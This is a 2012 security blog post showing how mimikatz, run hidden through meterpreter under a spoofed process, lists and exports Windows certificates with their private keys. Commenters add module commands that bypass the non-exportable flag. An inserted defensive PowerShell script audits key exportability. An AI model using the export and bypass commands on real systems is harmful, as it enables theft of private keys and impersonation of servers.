Monday, October 15, 2012

More with Mimikatz (Crypto Module)


So we all know that mimikatz dumps hashes and passwords!!! from memory, which is the shiznazzle.

But, now that it's working in memory, you can do lots more with it. Below are the various modules:

    • "standard" ; commandes de base
    • crypto ; Cryptographie et certificats
    • sekurlsa ; Dump de hashes et de mots de passes Windows
    • system ; Gestion système
    • process ; Manipulation des processus
    • thread ; Manipulation des threads
    • service ; Manipulation des services
    • privilege ; Manipulation des privilèges
    • winmine ; Manipulation du démineur de Windows XP (démonstration)
    • minesweeper ; Manipulation du démineur de Windows Vista et 7 (démonstration)
    • nogpo ; Pour éviter quelques GPO triviales
    • samdump ; Dump de SAM offline
    • inject ; Injecteur de librairies
    • ts ; Manipulations Terminal Server
    • divers ; Fonctions diverses trop petites pour s’émanciper

The Crypto module does some interesting things. I briefly talked about stealing certificates at DerbyCon; the crypto module helps you do this.

Things you are probably interested in are:

crypto::listkeys, crypto::listProviders, crypto::listStores, crypto::listCertificates

to identify the fun stuff on the host that you want for your own,

then crypto::exportKeys and crypto::exportCertificates

to take that stuff home.

kinda looks like this:

meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'
Process 9904 created.
Channel 20 created.
mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Sep  8 2012 15:18:27) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz(commandline) # crypto::listStores
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'
        My
        Root
        Trust
        CA
        TrustedPublisher
        Disallowed
        AuthRoot
        TrustedPeople
        ADDRESSBOOK


mimikatz(commandline) # exit


execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Sep  6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
         - sqlapps01
                Container Clé : SELFSSL
                Provider      : Microsoft RSA SChannel Cryptographic Provider
                Type          : AT_KEYEXCHANGE
                Exportabilité : OUI
                Taille clé    : 1024

mimikatz(commandline) # exit



execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Sep  6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
         - MACHINENAME
                Container Clé : SELFSSL
                Provider      : Microsoft RSA SChannel Cryptographic Provider
                Type          : AT_KEYEXCHANGE
                Exportabilité : OUI
                Taille clé    : 1024
                Export privé dans  'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK
                Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK

mimikatz(commandline) # exit


Once exported, you download the .pfx and .der files.
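The field that decides whether the export above succeeds is the one mimikatz prints as "Exportabilité : OUI". The script below is an added example, not part of the original post and not part of mimikatz: it walks the same LocalMachine\My store that crypto::listCertificates enumerated and reports, for every certificate that has a private key, whether that key is flagged exportable, so a defender can find the keys that would walk out the door this way. It assumes Windows PowerShell 5.x on .NET 4.6 or later (for RSACertificateExtensions) and an elevated session, since machine-store private keys are not readable otherwise; the function and parameter names are mine.

```powershell
# Added audit script (not from the original post, not part of mimikatz).
# Lists certificates in a store and reports whether each private key is marked exportable,
# i.e. which ones would show "Exportabilité : OUI" in crypto::listCertificates output.
# Assumes Windows PowerShell 5.x / .NET 4.6+ and an elevated session for the machine store.

param(
    [string]$StorePath = 'Cert:\LocalMachine\My'   # use Cert:\CurrentUser\My for the user's own store
)

function Get-KeyExportability {
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

    if (-not $Cert.HasPrivateKey) { return 'no private key' }
    try {
        $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
        if ($null -eq $rsa) { return 'non-RSA key (not checked)' }

        if ($rsa -is [System.Security.Cryptography.RSACng]) {
            # CNG key (KSP): the export policy is a flag set stored on the CngKey object
            $policy = $rsa.Key.ExportPolicy
            if ($policy -band [System.Security.Cryptography.CngExportPolicies]::AllowPlaintextExport) { return 'EXPORTABLE (plaintext)' }
            if ($policy -band [System.Security.Cryptography.CngExportPolicies]::AllowExport)          { return 'EXPORTABLE (encrypted only)' }
            return 'not exportable'
        }
        if ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
            # Legacy CAPI key (CSP, e.g. "Microsoft RSA SChannel Cryptographic Provider" in the post):
            # exportability lives in the key container info
            if ($rsa.CspKeyContainerInfo.Exportable) { return 'EXPORTABLE' } else { return 'not exportable' }
        }
        return 'unknown provider type'
    } catch {
        # Typically an access-denied on the key container when not running elevated
        return "error: $($_.Exception.Message)"
    }
}

Get-ChildItem -Path $StorePath | ForEach-Object {
    [pscustomobject]@{
        Subject       = $_.Subject
        Thumbprint    = $_.Thumbprint
        NotAfter      = $_.NotAfter
        Exportability = Get-KeyExportability -Cert $_
    }
} | Sort-Object Exportability -Descending | Format-Table -AutoSize
```

Run it from an elevated prompt and review anything reported as EXPORTABLE; web server and SQL certificates created with self-signed tools (like the SELFSSL container in the post) are commonly generated that way. Note the caveat in the comments below: "not exportable" is only a policy flag enforced by the software CSP/KSP, and crypto::patchcapi / crypto::patchcng exist precisely to ignore it, so the flag is a speed bump rather than a boundary. Keys that must never leave the host belong in a hardware-backed KSP (TPM or HSM), where there is no key material on disk for a patched provider to hand over.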
CG

3 comments:

dre said...

Maybe the next mimikatz feature can be Internet-happy English translations

Gentil Kiwi said...

No

:)

Gentil Kiwi said...

btw, don't forget:
- crypto::patchcapi
and/or
- privilege::debug
- crypto::patchcng

it exports "not exportable" ;)